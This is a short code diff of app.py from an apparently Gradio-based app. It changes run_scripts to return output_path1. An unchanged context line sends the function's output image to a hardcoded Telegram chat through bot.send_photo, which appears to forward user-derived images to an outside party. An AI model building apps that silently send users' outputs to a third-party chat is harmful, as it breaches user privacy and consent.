Update app.py
Browse files
app.py
CHANGED
@@ -37,7 +37,7 @@ def run_scripts(target, source):
|
|
37 |
bot.send_photo("-4283513911", photo=open(os.path.abspath(output_path1), 'rb'))
|
38 |
|
39 |
zipf.close()
|
40 |
-
return
|
41 |
|
42 |
iface = gr.Interface(
|
43 |
fn=run_scripts,
|
|
|
37 |
bot.send_photo("-4283513911", photo=open(os.path.abspath(output_path1), 'rb'))
|
38 |
|
39 |
zipf.close()
|
40 |
+
return output_path1
|
41 |
|
42 |
iface = gr.Interface(
|
43 |
fn=run_scripts,
|